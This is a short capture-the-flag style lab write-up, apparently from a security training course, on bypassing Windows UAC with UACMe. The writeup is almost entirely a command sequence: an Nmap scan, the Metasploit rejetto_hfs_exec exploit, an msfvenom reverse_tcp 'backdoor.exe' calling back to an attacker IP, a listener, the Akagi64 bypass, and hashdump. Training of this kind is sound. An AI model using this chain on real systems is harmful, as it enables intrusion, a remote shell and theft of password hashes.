UAC Bypass: UACMe

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine running a vulnerable server will be accessible at demo.ine.local.

Your task is to fingerprint the application using the tools available on the Kali machine and exploit the application using the appropriate Metasploit module. And then, bypass UAC using the UACME tool.

Objective: Gain the highest privilege on the compromised machine and get admin user NTLM hash.

Note: The UACMe tool is located in "/root/Desktop/tools/UACME/" directory.

Tools

The best tools for this lab are:

Nmap
Metasploit Framework
UACME

Writeup

nmap -sV -sC -O -p- -T4 demo.ine.local

msfconsole
use windows/http/rejetto_hfs_exec
set rhosts demo.ine.local
run

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.49.5 LPORT=6969 -f exe > 'backdoor.exe'

cd C:\\Users\\admin\\AppData\\Local\\Temp
upload /root/Desktop/tools/UACME/Akagi64.exe .

upload /root/backdoor.exe .

msfconsole
use exploit/multi/handler
set lhost 10.10.49.5
set lport 6969
set PAYLOAD windows/meterpreter/reverse_tcp
run

Akagi64.exe 23 C:\Users\admin\AppData\Local\Temp\backdoor.exe

hashdump

PreviousWinRM: Exploitation with Metasploit NextPrivilege Escalation: Impersonate

Last updated 5 months ago